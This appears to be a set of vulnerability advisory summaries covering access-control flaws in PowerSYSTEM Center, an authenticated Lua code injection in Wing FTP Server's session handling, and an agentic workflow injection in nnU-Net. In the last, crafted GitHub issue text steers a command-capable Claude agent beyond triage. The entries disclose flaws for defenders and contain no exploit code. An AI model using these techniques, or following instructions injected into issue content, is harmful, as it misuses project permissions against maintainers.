PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

PowerSYSTEM Center REST API endpoint for devices allows a low privilege authenticated user to access information normally limited by operational permissions.

PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only.

Wing FTP Server before 8.1.3 contains an authenticated remote code execution vulnerability in the session serialization mechanism that allows authenticated administrators to inject arbitrary Lua code through the domain admin mydirectory field. Attackers can exploit unsafe serialization of session values into Lua source code without proper escaping of closing delimiters, causing the injected code to be executed when the poisoned session is loaded via loadfile().

nnU-Net is a semantic segmentation framework that automatically adapts its pipeline to a dataset. Prior to 2.4.1, the nnU-Net Issue Triage workflow in .github/workflows/issue-triage.yml is vulnerable to Agentic Workflow Injection. The workflow sets allowed_non_write_users: ${{ github.event.issue.user.login }}, which means any logged-in GitHub user who opens an issue can reach this agentic workflow with attacker-controlled content. Untrusted issue title and body content are embedded directly into the prompt of anthropics/claude-code-action, and the workflow then runs a command-capable Claude agent with permission to comment on and relabel the current issue via gh. Because this workflow is triggered automatically on issues.opened, an external attacker can submit a crafted issue that steers the agent beyond its intended issue-triage purpose and influences authenticated issue actions. This vulnerability is fixed in 2.4.1.